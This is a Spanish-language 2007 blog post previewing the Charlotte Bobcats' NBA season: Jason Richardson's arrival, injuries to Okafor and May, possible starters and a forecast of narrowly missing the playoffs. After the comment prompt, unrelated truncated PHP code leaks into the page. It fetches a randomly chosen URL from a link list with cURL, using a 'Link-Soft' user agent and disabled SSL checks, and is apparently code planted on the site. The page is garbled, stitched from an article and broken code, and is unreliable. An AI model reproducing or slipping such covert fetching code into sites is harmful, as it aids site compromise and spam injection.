Charlotte Bobcats: puede ser un año histórico

03 de October de 2007 por txusma

Parece que la cosa funciona. Desde su creación, en la temporada 2004/2005, los Bobcats han aumentado año tras año su número de victorias y alcanzaron las 33 de la temporada pasada gracias a unas buenas elecciones de draft y a una confianza casi ciega en los jóvenes. Pero este año la directiva ha decidido intentar el asalto a los playoffs y luchar por conseguir la primera clasificación de la historia. Brandan Wright, comparado con Chris Bosh y Jermaine O’Neal y elegido en la posición 8 del último draft, fue traspasado esa misma noche a Golden State Warriors a cambio de Jason Richardson. Movimiento redondo: Los Bobcats conseguían el SG que les faltaba, un jugador de gran calidad, muy espectacular y capaz de echarse al equipo a sus espaldas.

Richardson deberá compartir el protagonismo con Gerald Wallace y Emeka Okafor. El primero ha sido la estrella indiscutible la última temporada y ha destacado en varios aspectos del juego tanto ofensivos como defensivos. Su talón de Aquiles podrían ser las lesiones ya que nunca ha disputado más de 72 partidos en una temporada. Es, casualmente, el mismo problema que presenta Okafor. Elegido con el número 2 en el draft de 2004, el primero de la franquicia, nunca ha acabado de cumplir todas las expectativas, en parte por culpa de sus reiteradas lesiones en la espalda que le obligaron en 2005 a perderse casi 60 partidos. Pero sano es un jugador muy importante en el juego interior de los Bobcats, muy intenso defensivamente y no exento de calidad en el juego ofensivo. Estos 3 jugadores, junto al base Raymond Felton, han de formar la columna vertebral del equipo.

Las dudas surgen sobre la última posición del quinteto inicial. Sean May parecía el hombre indicado para ser la pareja de Okafor en el juego interior pero una nueva lesión hará que se pierda toda la temporada. Un fuerte varapalo para este jugador de gran clase. Su ausencia abre todo un abanico de posibilidades que se inicia con el nombre de Primoz Brezec. En los primeros años de la franquicia gozó de la confianza de los entrenadores siendo titular en la mayoria de partidos, pero en esta última temporada ha disputado únicamente una media de 14.4 minutos por partido, por lo que sería una sorpresa que volviera a entrar en los planes de Sam Vincent. Desplazando a Gerald Wallace a la posición de PF aparecen otras opciones como Walter Hermann, que cuajó un final de temporada muy bueno y que gracias a su altura y fuerza podría ayudar en el juego interior, o Adam Morrison. El de Gonzaga, consciente de que ha decepcionado en su primera incursión en la NBA, inicia esta segunda temporada con el objetivo de mejorar su porcentaje de tiros de campo. Si logra ser regular podría ganarse un puesto en el quinteto que ya disfrutó en ocasiones la temporada pasada. Incluso se debería tener en cuenta a Matt Carroll. El año pasado ya disputó más de 45 partidos como titular y no sería extraño, si mantiene esa buena linea, que cuente con oportunidades.

Aparte de los ya mencionados destacan también los otros dos jugadores drafteados este año: Jared Dudley y Jermareo Davidson, ambos PF y que parecen llamados a cubrir posibles bajas de May y Okafor. Incluso Ryan Hollins, un C de segundo año que cuajó unas buenas ligas de verano, podría tener alguna oportunidad ante las lesiones y la falta de confianza en Primoz Brezec.

Este puede ser un año histórico para los Charlotte Bobcats. Si las lesiones dejan de asolar a este equipo no sería extraño encontrarles luchando por entrar en Playoffs. En todo caso, debido a su fragilidad en el juego interior, no les será nada fácil.

Quinteto: Raymond Felton, Jason Richardson, Gerald Wallace, Sean May y Emeka Okafor
Sexto hombre: Adam Morrison

Pronóstico: Fuera de playoffs por poco

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>